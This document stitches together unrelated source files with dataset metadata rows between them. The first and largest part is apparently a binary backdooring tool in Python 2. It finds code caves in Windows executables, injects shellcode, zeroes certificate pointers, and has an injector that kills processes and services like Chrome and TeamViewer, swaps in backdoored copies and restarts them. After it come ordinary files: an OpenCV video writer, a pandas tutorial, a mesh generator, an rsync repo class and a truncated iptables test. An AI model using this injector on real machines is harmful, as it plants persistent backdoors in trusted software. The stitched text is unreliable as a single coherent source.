for i, caves in enumerate(caveTracker):
i += 1
for section in self.flItms['Sections']:
sectionFound = False
try:
if caves[0] >= section[4] and \
caves[1] <= (section[3] + section[4]) and \
caves[1] - caves[0] >= SIZE_CAVE_TO_FIND:
if self.VERBOSE is True:
print "Inserting code in this section:", section[0]
print '->Begin Cave', hex(caves[0])
print '->End of Cave', hex(caves[1])
print 'Size of Cave (int)', caves[1] - caves[0]
print 'SizeOfRawData', hex(section[3])
print 'PointerToRawData', hex(section[4])
print 'End of Raw Data:', hex(section[3] + section[4])
print '*' * 50
JMPtoCodeAddress = (section[2] + caves[0] - section[4] -
5 - self.flItms['AddressOfEntryPoint'])
sectionFound = True
pickACave[i] = [section[0], hex(caves[0]), hex(caves[1]),
caves[1] - caves[0], hex(section[4]),
hex(section[3] + section[4]), JMPtoCodeAddress]
break
except:
print "-End of File Found.."
break
if sectionFound is False:
if self.VERBOSE is True:
print "No section"
print '->Begin Cave', hex(caves[0])
print '->End of Cave', hex(caves[1])
print 'Size of Cave (int)', caves[1] - caves[0]
print '*' * 50
JMPtoCodeAddress = (section[2] + caves[0] - section[4] -
5 - self.flItms['AddressOfEntryPoint'])
try:
pickACave[i] = [None, hex(caves[0]), hex(caves[1]),
caves[1] - caves[0], None,
None, JMPtoCodeAddress]
except:
print "EOF"
print ("############################################################\n"
"The following caves can be used to inject code and possibly\n"
"continue execution.\n"
"**Don't like what you see? Use jump, single, append, or ignore.**\n"
"############################################################")
CavesPicked = {}
for k, item in enumerate(len_allshells):
print "[*] Cave {0} length as int: {1}".format(k + 1, item)
print "[*] Available caves: "
for ref, details in pickACave.iteritems():
if details[3] >= item:
print str(ref) + ".", ("Section Name: {0}; Section Begin: {4} "
"End: {5}; Cave begin: {1} End: {2}; "
"Cave Size: {3}".format(details[0], details[1], details[2],
details[3], details[4], details[5],
details[6]))
while True:
try:
self.CAVE_MINER_TRACKER
except:
self.CAVE_MINER_TRACKER = 0
print "*" * 50
selection = raw_input("[!] Enter your selection: ")
try:
selection = int(selection)
print "[!] Using selection: %s" % selection
try:
if self.CHANGE_ACCESS is True:
if pickACave[selection][0] is not None:
self.change_section_flags(pickACave[selection][0])
CavesPicked[k] = pickACave[selection]
break
except:
print "[!!!!] User selection beyond the bounds of available caves."
print "[!!!!] Try a number or the following commands:"
print "[!!!!] append or a, jump or j, ignore or i, single or s"
print "[!!!!] TRY AGAIN."
continue
except:
pass
breakOutValues = ['append', 'jump', 'single', 'ignore', 'a', 'j', 's', 'i']
if selection.lower() in breakOutValues:
return selection
return CavesPicked
def runas_admin(self):
"""
This module jumps to .rsrc section and checks for
the following string: requestedExecutionLevel level="highestAvailable"
"""
#g = open(flItms['filename'], "rb")
runas_admin = False
print "[*] Checking Runas_admin"
if 'rsrcPointerToRawData' in self.flItms:
self.binary.seek(self.flItms['rsrcPointerToRawData'], 0)
search_lngth = len('requestedExecutionLevel level="highestAvailable"')
data_read = 0
while data_read < self.flItms['rsrcSizeRawData']:
self.binary.seek(self.flItms['rsrcPointerToRawData'] + data_read, 0)
temp_data = self.binary.read(search_lngth)
if temp_data == 'requestedExecutionLevel level="highestAvailable"':
runas_admin = True
break
data_read += 1
if runas_admin is True:
print "[*] %s must run with highest available privileges" % self.FILE
else:
print "[*] %s does not require highest available privileges" % self.FILE
return runas_admin
def support_check(self):
"""
This function is for checking if the current exe/dll is
        supported by this program. Returns False if not supported;
        otherwise it populates self.flItms and sets flItms['supported'].
"""
print "[*] Checking if binary is supported"
self.flItms['supported'] = False
#convert to with open FIX
self.binary = open(self.FILE, "r+b")
if self.binary.read(2) != "\x4d\x5a":
print "%s not a PE File" % self.FILE
return False
self.gather_file_info_win()
if self.flItms is False:
return False
if MachineTypes[hex(self.flItms['MachineType'])] not in supported_types:
for item in self.flItms:
print item + ':', self.flItms[item]
print ("This program does not support this format: %s"
% MachineTypes[hex(self.flItms['MachineType'])])
else:
self.flItms['supported'] = True
targetFile = intelCore(self.flItms, self.binary, self.VERBOSE)
if self.flItms['Characteristics'] - 0x2000 > 0 and self.PATCH_DLL is False:
return False
if self.flItms['Magic'] == int('20B', 16) and (self.IMAGE_TYPE == 'ALL' or self.IMAGE_TYPE == 'x64'):
#if self.IMAGE_TYPE == 'ALL' or self.IMAGE_TYPE == 'x64':
targetFile.pe64_entry_instr()
elif self.flItms['Magic'] == int('10b', 16) and (self.IMAGE_TYPE == 'ALL' or self.IMAGE_TYPE == 'x86'):
#if self.IMAGE_TYPE == 'ALL' or self.IMAGE_TYPE == 'x32':
targetFile.pe32_entry_instr()
else:
self.flItms['supported'] = False
if self.CHECK_ADMIN is True:
self.flItms['runas_admin'] = self.runas_admin()
if self.VERBOSE is True:
self.print_flItms(self.flItms)
if self.flItms['supported'] is False:
return False
self.binary.close()
def patch_pe(self):
"""
        This function drives the sequence of calls involved
        in patching the binary.
"""
print "[*] In the backdoor module"
if self.INJECTOR is False:
os_name = os.name
if not os.path.exists("backdoored"):
os.makedirs("backdoored")
if os_name == 'nt':
self.OUTPUT = "backdoored\\" + self.OUTPUT
else:
self.OUTPUT = "backdoored/" + self.OUTPUT
issupported = self.support_check()
if issupported is False:
return None
self.flItms['NewCodeCave'] = self.ADD_SECTION
self.flItms['cave_jumping'] = self.CAVE_JUMPING
self.flItms['CavesPicked'] = {}
self.flItms['LastCaveAddress'] = 0
self.flItms['stager'] = False
self.flItms['supplied_shellcode'] = self.SUPPLIED_SHELLCODE
theResult = self.set_shells()
if theResult is False or self.flItms['allshells'] is False:
return False
#Creating file to backdoor
self.flItms['backdoorfile'] = self.OUTPUT
shutil.copy2(self.FILE, self.flItms['backdoorfile'])
self.binary = open(self.flItms['backdoorfile'], "r+b")
#reserve space for shellcode
targetFile = intelCore(self.flItms, self.binary, self.VERBOSE)
# Finding the length of the resume Exe shellcode
if self.flItms['Magic'] == int('20B', 16):
_, self.flItms['resumeExe'] = targetFile.resume_execution_64()
else:
_, self.flItms['resumeExe'] = targetFile.resume_execution_32()
shellcode_length = len(self.flItms['shellcode'])
self.flItms['shellcode_length'] = shellcode_length + len(self.flItms['resumeExe'])
caves_set = False
while caves_set is False and self.flItms['NewCodeCave'] is False:
#if self.flItms['NewCodeCave'] is False:
#self.flItms['JMPtoCodeAddress'], self.flItms['CodeCaveLOC'] = (
self.flItms['CavesPicked'] = self.find_cave()
if type(self.flItms['CavesPicked']) == str:
if self.flItms['CavesPicked'].lower() in ['append', 'a']:
self.flItms['JMPtoCodeAddress'] = None
self.flItms['CodeCaveLOC'] = 0
self.flItms['cave_jumping'] = False
self.flItms['CavesPicked'] = {}
print "-resetting shells"
self.set_shells()
caves_set = True
elif self.flItms['CavesPicked'].lower() in ['jump', 'j']:
self.flItms['JMPtoCodeAddress'] = None
self.flItms['CodeCaveLOC'] = 0
self.flItms['cave_jumping'] = True
self.flItms['CavesPicked'] = {}
print "-resetting shells"
self.set_shells()
continue
elif self.flItms['CavesPicked'].lower() in ['single', 's']:
self.flItms['JMPtoCodeAddress'] = None
self.flItms['CodeCaveLOC'] = 0
self.flItms['cave_jumping'] = False
self.flItms['CavesPicked'] = {}
print "-resetting shells"
self.set_shells()
continue
elif self.flItms['CavesPicked'].lower() in ['ignore', 'i']:
#Let's say we don't want to patch a binary
return None
elif self.flItms['CavesPicked'] is None:
return None
else:
self.flItms['JMPtoCodeAddress'] = self.flItms['CavesPicked'].iteritems().next()[1][6]
caves_set = True
#else:
# caves_set = True
#If no cave found, continue to create one.
if self.flItms['JMPtoCodeAddress'] is None or self.flItms['NewCodeCave'] is True:
self.create_code_cave()
self.flItms['NewCodeCave'] = True
print "- Adding a new section to the exe/dll for shellcode injection"
else:
self.flItms['LastCaveAddress'] = self.flItms['CavesPicked'][len(self.flItms['CavesPicked']) - 1][6]
#Patch the entry point
targetFile = intelCore(self.flItms, self.binary, self.VERBOSE)
targetFile.patch_initial_instructions()
if self.flItms['Magic'] == int('20B', 16):
ReturnTrackingAddress, self.flItms['resumeExe'] = targetFile.resume_execution_64()
else:
ReturnTrackingAddress, self.flItms['resumeExe'] = targetFile.resume_execution_32()
self.set_shells()
if self.flItms['cave_jumping'] is True:
if self.flItms['stager'] is False:
temp_jmp = "\xe9"
breakupvar = eat_code_caves(self.flItms, 1, 2)
test_length = int(self.flItms['CavesPicked'][2][1], 16) - int(self.flItms['CavesPicked'][1][1], 16) - len(self.flItms['allshells'][1]) - 5
if test_length < 0:
temp_jmp += struct.pack("<I", 0xffffffff - abs(breakupvar - len(self.flItms['allshells'][1]) - 4))
else:
temp_jmp += struct.pack("<I", breakupvar - len(self.flItms['allshells'][1]) - 5)
self.flItms['allshells'] += (self.flItms['resumeExe'], )
self.flItms['completeShellcode'] = self.flItms['shellcode'] + self.flItms['resumeExe']
if self.flItms['NewCodeCave'] is True:
self.binary.seek(self.flItms['newSectionPointerToRawData'] + self.flItms['buffer'])
self.binary.write(self.flItms['completeShellcode'])
if self.flItms['cave_jumping'] is True:
for i, item in self.flItms['CavesPicked'].iteritems():
self.binary.seek(int(self.flItms['CavesPicked'][i][1], 16))
self.binary.write(self.flItms['allshells'][i])
#So we can jump to our resumeExe shellcode
if i == (len(self.flItms['CavesPicked']) - 2) and self.flItms['stager'] is False:
self.binary.write(temp_jmp)
else:
for i, item in self.flItms['CavesPicked'].iteritems():
if i == 0:
self.binary.seek(int(self.flItms['CavesPicked'][i][1], 16))
self.binary.write(self.flItms['completeShellcode'])
#Patch certTable
if self.ZERO_CERT is True:
print "[*] Overwriting certificate table pointer"
self.binary.seek(self.flItms['CertTableLOC'], 0)
self.binary.write("\x00\x00\x00\x00\x00\x00\x00\x00")
print "[*] {0} backdooring complete".format(self.FILE)
self.binary.close()
if self.VERBOSE is True:
self.print_flItms(self.flItms)
return True
def output_options(self):
"""
Output file check.
"""
if not self.OUTPUT:
self.OUTPUT = os.path.basename(self.FILE)
def set_shells(self):
"""
This function sets the shellcode.
"""
print "[*] Looking for and setting selected shellcode"
if self.flItms['Magic'] == int('10B', 16):
self.flItms['bintype'] = winI32_shellcode
if self.flItms['Magic'] == int('20B', 16):
self.flItms['bintype'] = winI64_shellcode
if not self.SHELL:
print "You must choose a backdoor to add: (use -s)"
for item in dir(self.flItms['bintype']):
if "__" in item:
continue
elif ("returnshellcode" == item
or "pack_ip_addresses" == item
or "eat_code_caves" == item
or 'ones_compliment' == item
or 'resume_execution' in item
or 'returnshellcode' in item):
continue
else:
print " {0}".format(item)
return False
if self.SHELL not in dir(self.flItms['bintype']):
print "The following %ss are available: (use -s)" % str(self.flItms['bintype']).split(".")[1]
for item in dir(self.flItms['bintype']):
#print item
if "__" in item:
continue
elif "returnshellcode" == item or "pack_ip_addresses" == item or "eat_code_caves" == item:
continue
else:
print " {0}".format(item)
return False
#else:
# shell_cmd = self.SHELL + "()"
self.flItms['shells'] = self.flItms['bintype'](self.HOST, self.PORT, self.SUPPLIED_SHELLCODE)
self.flItms['allshells'] = getattr(self.flItms['shells'], self.SHELL)(self.flItms, self.flItms['CavesPicked'])
self.flItms['shellcode'] = self.flItms['shells'].returnshellcode()
def injector(self):
"""
        The injector module will hunt for and inject shellcode into
targets that are in the list_of_targets dict.
Data format DICT: {process_name_to_backdoor :
[('dependencies to kill', ),
'service to kill', restart=True/False],
}
"""
list_of_targets = {'chrome.exe':
[('chrome.exe', ), None, True], 'hamachi-2.exe':
[('hamachi-2.exe', ), "Hamachi2Svc", True],
'tcpview.exe': [('tcpview.exe',), None, True],
#'rpcapd.exe':
#[('rpcapd.exe'), None, False],
'psexec.exe':
[('psexec.exe',), 'PSEXESVC.exe', False],
'vncserver.exe':
[('vncserver.exe', ), 'vncserver', True],
# must append code cave for vmtoolsd.exe
'vmtoolsd.exe':
[('vmtools.exe', 'vmtoolsd.exe'), 'VMTools', True],
'nc.exe': [('nc.exe', ), None, False],
'Start Tor Browser.exe':
[('Start Tor Browser.exe', ), None, False],
'procexp.exe': [('procexp.exe',
'procexp64.exe'), None, True],
'procmon.exe': [('procmon.exe',
'procmon64.exe'), None, True],
'TeamViewer.exe': [('tv_x64.exe',
'tv_x32.exe'), None, True]
}
print "[*] Beginning injector module"
os_name = os.name
if os_name == 'nt':
if "PROGRAMFILES(x86)" in os.environ:
print "-You have a 64 bit system"
system_type = 64
else:
print "-You have a 32 bit system"
system_type = 32
else:
print "This works only on windows. :("
sys.exit()
winversion = platform.version()
rootdir = os.path.splitdrive(sys.executable)[0]
#print rootdir
targetdirs = []
excludedirs = []
#print system_info
winXP2003x86targetdirs = [rootdir + '\\']
winXP2003x86excludedirs = [rootdir + '\\Windows\\',
rootdir + '\\RECYCLER\\',
'\\VMWareDnD\\']
vista7win82012x64targetdirs = [rootdir + '\\']
vista7win82012x64excludedirs = [rootdir + '\\Windows\\',
rootdir + '\\RECYCLER\\',
'\\VMwareDnD\\']
#need win2003, win2008, win8
if "5.0." in winversion:
print "-OS is 2000"
targetdirs = targetdirs + winXP2003x86targetdirs
excludedirs = excludedirs + winXP2003x86excludedirs
elif "5.1." in winversion:
print "-OS is XP"
if system_type == 64:
targetdirs.append(rootdir + '\\Program Files (x86)\\')
excludedirs.append(vista7win82012x64excludedirs)
else:
targetdirs = targetdirs + winXP2003x86targetdirs
excludedirs = excludedirs + winXP2003x86excludedirs
elif "5.2." in winversion:
print "-OS is 2003"
if system_type == 64:
targetdirs.append(rootdir + '\\Program Files (x86)\\')
excludedirs.append(vista7win82012x64excludedirs)
else:
targetdirs = targetdirs + winXP2003x86targetdirs
excludedirs = excludedirs + winXP2003x86excludedirs
elif "6.0." in winversion:
print "-OS is Vista/2008"
if system_type == 64:
targetdirs = targetdirs + vista7win82012x64targetdirs
excludedirs = excludedirs + vista7win82012x64excludedirs
else:
targetdirs.append(rootdir + '\\Program Files\\')
excludedirs.append(rootdir + '\\Windows\\')
elif "6.1." in winversion:
print "-OS is Win7/2008"
if system_type == 64:
targetdirs = targetdirs + vista7win82012x64targetdirs
excludedirs = excludedirs + vista7win82012x64excludedirs
else:
targetdirs.append(rootdir + '\\Program Files\\')
excludedirs.append(rootdir + '\\Windows\\')
elif "6.2." in winversion:
print "-OS is Win8/2012"
targetdirs = targetdirs + vista7win82012x64targetdirs
excludedirs = excludedirs + vista7win82012x64excludedirs
filelist = set()
exclude = False
for path in targetdirs:
for root, subFolders, files in os.walk(path):
for directory in excludedirs:
if directory.lower() in root.lower():
#print directory.lower(), root.lower()
#print "Path not allowed", root
exclude = True
#print exclude
break
if exclude is False:
for _file in files:
f = os.path.join(root, _file)
for target, items in list_of_targets.iteritems():
if target.lower() == _file.lower():
#print target, f
print "-- Found the following file:", root + '\\' + _file
filelist.add(f)
#print exclude
exclude = False
#grab tasklist
process_list = []
all_process = os.popen("tasklist.exe")
ap = all_process.readlines()
all_process.close()
ap.pop(0) # remove blank line
ap.pop(0) # remove header line
ap.pop(0) # remove this ->> =======
for process in ap:
process_list.append(process.split())
#print process_list
#print filelist
for target in filelist:
service_target = False
running_proc = False
#get filename
#support_result = support_check(target, 0)
#if support_result is False:
# continue
filename = os.path.basename(target)
for process in process_list:
#print process
for setprocess, items in list_of_targets.iteritems():
if setprocess.lower() in target.lower():
#print setprocess, process
for item in items[0]:
if item.lower() in [x.lower() for x in process]:
print "- Killing process:", item
try:
#print process[1]
os.system("taskkill /F /PID %i" %
int(process[1]))
running_proc = True
except Exception as e:
print str(e)
if setprocess.lower() in [x.lower() for x in process]:
#print True, items[0], items[1]
if items[1] is not None:
print "- Killing Service:", items[1]
try:
os.system('net stop %s' % items[1])
except Exception as e:
print str(e)
service_target = True
time.sleep(1)
#backdoor the targets here:
print "*" * 50
self.FILE = target
self.OUTPUT = os.path.basename(self.FILE + '.bd')
print "self.OUTPUT", self.OUTPUT
print "- Backdooring:", self.FILE
result = self.patch_pe()
if result:
pass
else:
continue
shutil.copy2(self.FILE, self.FILE + self.SUFFIX)
os.chmod(self.FILE, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
time.sleep(1)
try:
os.unlink(self.FILE)
except:
print "unlinking error"
time.sleep(.5)
try:
shutil.copy2(self.OUTPUT, self.FILE)
except:
os.system('move {0} {1}'.format(self.FILE, self.OUTPUT))
time.sleep(.5)
os.remove(self.OUTPUT)
print (" - The original file {0} has been renamed to {1}".format(self.FILE,
self.FILE + self.SUFFIX))
if self.DELETE_ORIGINAL is True:
print "!!Warning Deleteing Original File!!"
os.remove(self.FILE + self.SUFFIX)
if service_target is True:
#print "items[1]:", list_of_targets[filename][1]
os.system('net start %s' % list_of_targets[filename][1])
else:
try:
if (list_of_targets[filename][2] is True and
running_proc is True):
subprocess.Popen([self.FILE, ])
print "- Restarting:", self.FILE
else:
print "-- %s was not found online - not restarting" % self.FILE
except:
if (list_of_targets[filename.lower()][2] is True and
running_proc is True):
subprocess.Popen([self.FILE, ])
print "- Restarting:", self.FILE
else:
print "-- %s was not found online - not restarting" % self.FILE
| gpl-3.0 | -1,369,329,645,116,319,000 | 45.241232 | 154 | 0.514337 | false | 3.941378 | false | false | false |
learningequality/video-vectorization | video_processing/processors/opencv_video_encoder.py | 1 | 1460 | """A video encoder processor that uses OpenCV to write video frames to a file.
A wrapper around the OpenCV VideoWriter class.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from video_processing import stream_processor
import cv2
class OpenCVVideoEncoderProcessor(stream_processor.ProcessorBase):
"""Processor for encoding video using OpenCV."""
def __init__(self, configuration):
self._output_video_file = configuration.get('output_video_file', '')
self._video_stream_name = configuration.get('video_stream_name', 'video')
self._fourcc_string = configuration.get('fourcc', 'DIVX')
self._index = 0
def open(self, stream_set):
fourcc = cv2.VideoWriter_fourcc(*self._fourcc_string)
frame_rate = stream_set.frame_rate_hz
header = stream_set.stream_headers[
self._video_stream_name].header_data
self._video_writer = cv2.VideoWriter(self._output_video_file, fourcc,
frame_rate,
(header.image_width,
header.image_height))
return stream_set
def process(self, frame_set):
if frame_set.get(self._video_stream_name, False):
video_frame = frame_set[self._video_stream_name].data
self._video_writer.write(video_frame)
return frame_set
def close(self):
self._video_writer.release()
return []
| mit | -5,255,766,905,365,025,000 | 33.761905 | 78 | 0.652055 | false | 3.924731 | false | false | false |
robmarano/nyu-python | course-2/session-7/pandas/df_basics.py | 1 | 2677 | #!/usr/bin/env python3
try:
# for Python 2.x
import StringIO
except:
# for Python 3.x
import io
import csv
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import re
# define data
csv_input = """timestamp,title,reqid
2016-07-23 11:05:08,SVP,2356556-AS
2016-12-12 01:23:33,VP,5567894-AS
2016-09-13 12:43:33,VP,3455673-AS
2016-09-13 19:43:33,EVP,8455673-AS
2016-09-30 11:43:33,VP,9455673-AS
2016-08-02 01:23:33,VP,5698765-AS
2016-04-22 01:23:33,VP,1234556-AS
"""
# load data
try:
# for Python 2.x
f = StringIO.StringIO(csv_input)
except:
# for Python 3.x
f = io.StringIO(csv_input)
reader = csv.reader(f, delimiter=',')
for row in reader:
print('\t'.join(row))
# reset file pointer position to beginning of file
f.seek(0)
# create pandas dataframe
#df = pd.read_csv(io.StringIO(csv_input))
df = pd.read_csv(f)
print(df.head())
print(df.info())
print(df)
df['date'] = pd.DatetimeIndex(df.timestamp).normalize()
print(df)
print(df.index)
#df = df.drop('timestamp',axis=1)
df.drop('timestamp', axis=1, inplace=True)
#df = df.reindex(df.reqid, fill_value=0)
#df = df.reindex(df.reqid, method='bfill')
#print(df)
#print(df.index)
#i = df[((df.title == 'SVP') & (df.reqid == '3455673-AS'))].index
#df.drop(df.index[0],inplace=True)
#df.drop(i,inplace=True)
#i = df.index[0]
#df = df.drop(i)
#print(df)
#print(i)
print(type(df['date'][0]))
#df = df.sort_values(by='date',axis=0,ascending=True)
df.sort_values(by='date',axis=0,ascending=True,inplace=True)
print(df)
df['weekday'] = df['date'].apply( lambda x: x.dayofweek)
# setup date processing
now_string = '2016-10-01 08:01:20'
past_by_days = 30
time_delta = pd.to_timedelta('{} days'.format(past_by_days))
print(time_delta)
#now = pd.tslib.Timestamp('2016-10-01 08:01:20')
now = pd.Timestamp(now_string)
now_norm = now.normalize()
print(now_norm)
now_start = now_norm - time_delta
print(now_start)
# process
ddf = df.loc[((df['date'] >= now_start) & (df['date'] <= now_norm))]
print(ddf)
print('number of observations found in filtered df = {}'.format(len(ddf)))
print(len(ddf.columns))
# histogram of number of observations by date
df_grouped_date = df.groupby(['date'])
df_date_count = df_grouped_date['reqid'].aggregate(['count'])
#df_date_count = df_grouped_date.aggregate(['count'])
print(df_date_count)
#exclude_cols = ['title count']
#df_date_count.ix[:, df_date_count.columns.difference(exclude_cols)].plot(kind='bar')
df_date_count.ix[:, df_date_count.columns].plot(kind='bar')
plt.legend(loc='best').get_texts()[0].set_text('Reqs Added Per Day')
file_name = 'myBar'
file_name = re.sub('\s+','_',file_name)
plt.savefig(file_name)
plt.show()
| mit | -4,452,807,237,788,922,400 | 22.482456 | 85 | 0.680613 | false | 2.561722 | false | false | false |
mathLab/RBniCS | tutorials/11_quasi_geostrophic/data/generate_mesh.py | 1 | 1376 | # Copyright (C) 2015-2021 by the RBniCS authors
#
# This file is part of RBniCS.
#
# SPDX-License-Identifier: LGPL-3.0-or-later
from dolfin import *
from mshr import *
# Create mesh
domain = Rectangle(Point(0., 0.), Point(1., 1.))
mesh = generate_mesh(domain, 30)
# Create subdomains
subdomains = MeshFunction("size_t", mesh, 2)
subdomains.set_all(0)
# Create boundaries
class Left(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and abs(x[0] - 0.) < DOLFIN_EPS
class Right(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and abs(x[0] - 1.) < DOLFIN_EPS
class Bottom(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and abs(x[1] - 0.) < DOLFIN_EPS
class Top(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and abs(x[1] - 1.) < DOLFIN_EPS
boundaries = MeshFunction("size_t", mesh, mesh.topology().dim() - 1)
bottom = Bottom()
bottom.mark(boundaries, 1)
right = Right()
right.mark(boundaries, 2)
top = Top()
top.mark(boundaries, 3)
left = Left()
left.mark(boundaries, 4)
# Save
File("square.xml") << mesh
File("square_physical_region.xml") << subdomains
File("square_facet_region.xml") << boundaries
XDMFFile("square.xdmf").write(mesh)
XDMFFile("square_physical_region.xdmf").write(subdomains)
XDMFFile("square_facet_region.xdmf").write(boundaries)
| lgpl-3.0 | 7,467,292,417,435,287,000 | 23.571429 | 68 | 0.68532 | false | 2.946467 | false | false | false |
Hummer12007/pomu | pomu/repo/remote/rsync.py | 1 | 1673 | """A class for remote rsync repos"""
from os import rmdir, unlink, path
from subprocess import run, PIPE
from tempfile import mkdtemp
from pomu.repo.remote.remote import RemoteRepo, normalize_key
from pomu.util.result import Result
class RemoteRsyncRepo(RemoteRepo):
"""A class responsible for rsync remotes"""
def __init__(self, url):
self.uri = url
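    # Illustrative usage (the URL is an assumption):
    #   RemoteRsyncRepo('rsync://example.org/repo/').fetch_tree()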
def __enter__(self):
pass
def __exit__(self, *_):
pass
def fetch_tree(self):
"""Returns repos hierarchy"""
if hasattr(self, '_tree'):
return self._tree
d = mkdtemp()
        p = run(['rsync', '-rn', '--out-format=%n', self.uri, d],
                stdout=PIPE, universal_newlines=True)
        rmdir(d)
        if p.returncode:
            return Result.Err()
        self._tree = ['/' + x for x in p.stdout.split('\n') if x]
return self._tree
def fetch_subtree(self, key):
"""Lists a subtree"""
k = normalize_key(key, True)
self.fetch_tree()
        if k not in self._tree:
return []
l = len(key)
return Result.Ok(
[tpath[l:] for tpath in self.fetch_tree() if tpath.startswith(k)])
def fetch_file(self, key):
"""Fetches a file from the repo"""
k = normalize_key(key)
self.fetch_tree()
        if k not in self._tree:
            return Result.Err()
        d = mkdtemp()
        dest = path.join(d, 'dest')
        # Use a plain temp file: rsync-ing into a FIFO with no reader would block.
        p = run(['rsync', self.uri.rstrip('/') + key, dest])
        if p.returncode:
            rmdir(d)
            return Result.Err()
        with open(dest) as f:
            fout = f.read()
        unlink(dest)
        rmdir(d)
        return Result.Ok(fout)
| gpl-2.0 | -8,406,564,571,039,926,000 | 27.355932 | 82 | 0.537358 | false | 3.759551 | false | false | false |
TrimBiggs/calico | calico/felix/test/test_fiptgenerator.py | 1 | 22422 | # -*- coding: utf-8 -*-
# Copyright 2015 Metaswitch Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
felix.test.test_fiptgenerator.py
~~~~~~~~~~~~~~~~~~~~~~~~~
Tests of iptables rules generation function.
"""
import logging
from collections import OrderedDict
from calico.felix.selectors import parse_selector
from mock import Mock
from calico.datamodel_v1 import TieredPolicyId
from calico.felix.fiptables import IptablesUpdater
from calico.felix.profilerules import UnsupportedICMPType
from calico.felix.test.base import BaseTestCase, load_config
_log = logging.getLogger(__name__)
DEFAULT_MARK = '--append %s --jump MARK --set-mark 0x1000000/0x1000000'
DEFAULT_UNMARK = (
'--append %s '
'--match comment --comment "No match, fall through to next profile" '
'--jump MARK --set-mark 0/0x1000000'
)
INPUT_CHAINS = {
"Default": [
'--append felix-INPUT ! --in-interface tap+ --jump RETURN',
'--append felix-INPUT --match conntrack --ctstate INVALID --jump DROP',
'--append felix-INPUT --match conntrack --ctstate RELATED,ESTABLISHED --jump ACCEPT',
'--append felix-INPUT --protocol tcp --destination 123.0.0.1 --dport 1234 --jump ACCEPT',
'--append felix-INPUT --protocol udp --sport 68 --dport 67 '
'--jump ACCEPT',
'--append felix-INPUT --protocol udp --dport 53 --jump ACCEPT',
'--append felix-INPUT --jump DROP -m comment --comment "Drop all packets from endpoints to the host"',
],
"IPIP": [
'--append felix-INPUT --protocol 4 --match set ! --match-set felix-hosts src --jump DROP',
'--append felix-INPUT ! --in-interface tap+ --jump RETURN',
'--append felix-INPUT --match conntrack --ctstate INVALID --jump DROP',
'--append felix-INPUT --match conntrack --ctstate RELATED,ESTABLISHED --jump ACCEPT',
'--append felix-INPUT --protocol tcp --destination 123.0.0.1 --dport 1234 --jump ACCEPT',
'--append felix-INPUT --protocol udp --sport 68 --dport 67 '
'--jump ACCEPT',
'--append felix-INPUT --protocol udp --dport 53 --jump ACCEPT',
'--append felix-INPUT --jump DROP -m comment --comment "Drop all packets from endpoints to the host"',
],
"Return": [
'--append felix-INPUT ! --in-interface tap+ --jump RETURN',
'--append felix-INPUT --match conntrack --ctstate INVALID --jump DROP',
'--append felix-INPUT --match conntrack --ctstate RELATED,ESTABLISHED --jump ACCEPT',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 130',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 131',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 132',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 133',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 135',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 136',
'--append felix-INPUT --protocol udp --sport 546 --dport 547 --jump ACCEPT',
'--append felix-INPUT --protocol udp --dport 53 --jump ACCEPT',
'--append felix-INPUT --jump felix-FROM-ENDPOINT',
]
}
SELECTOR_A_EQ_B = parse_selector("a == 'b'")
RULES_TESTS = [
{
"ip_version": 4,
"tag_to_ipset": {},
"sel_to_ipset": {SELECTOR_A_EQ_B: "a-eq-b"},
"profile": {
"id": "prof1",
"inbound_rules": [
{"src_selector": SELECTOR_A_EQ_B,
"action": "next-tier"}
],
"outbound_rules": [
{"dst_selector": SELECTOR_A_EQ_B,
"action": "next-tier"}
]
},
"updates": {
'felix-p-prof1-i':
[
DEFAULT_MARK % "felix-p-prof1-i",
'--append felix-p-prof1-i '
'--match set --match-set a-eq-b src '
'--jump MARK --set-mark 0x2000000/0x2000000',
'--append felix-p-prof1-i --match mark '
'--mark 0x2000000/0x2000000 --jump RETURN',
DEFAULT_UNMARK % "felix-p-prof1-i",
],
'felix-p-prof1-o':
[
DEFAULT_MARK % "felix-p-prof1-o",
'--append felix-p-prof1-o '
'--match set --match-set a-eq-b dst '
'--jump MARK --set-mark 0x2000000/0x2000000',
'--append felix-p-prof1-o --match mark '
'--mark 0x2000000/0x2000000 --jump RETURN',
DEFAULT_UNMARK % "felix-p-prof1-o",
]
},
},
{
"ip_version": 4,
"tag_to_ipset": {
"src-tag": "src-tag-name",
"dst-tag": "dst-tag-name"
},
"profile": {
"id": "prof1",
"inbound_rules": [
{"src_net": "10.0.0.0/8"}
],
"outbound_rules": [
{"protocol": "icmp",
"src_net": "10.0.0.0/8",
"icmp_type": 7,
"icmp_code": 123}
]
},
"updates": {
'felix-p-prof1-i':
[
DEFAULT_MARK % "felix-p-prof1-i",
'--append felix-p-prof1-i --source 10.0.0.0/8 --jump RETURN',
DEFAULT_UNMARK % "felix-p-prof1-i",
],
'felix-p-prof1-o':
[
DEFAULT_MARK % "felix-p-prof1-o",
"--append felix-p-prof1-o --protocol icmp --source "
"10.0.0.0/8 --match icmp --icmp-type 7/123 --jump RETURN",
DEFAULT_UNMARK % "felix-p-prof1-o",
]
},
},
{
"ip_version": 4,
"tag_to_ipset": {
"src-tag": "src-tag-name",
"dst-tag": "dst-tag-name"
},
"profile": {
"id": "prof1",
"inbound_rules": [
{"protocol": "icmp",
"src_net": "10.0.0.0/8",
"icmp_type": 7
}
],
"outbound_rules": [
{"protocol": "tcp",
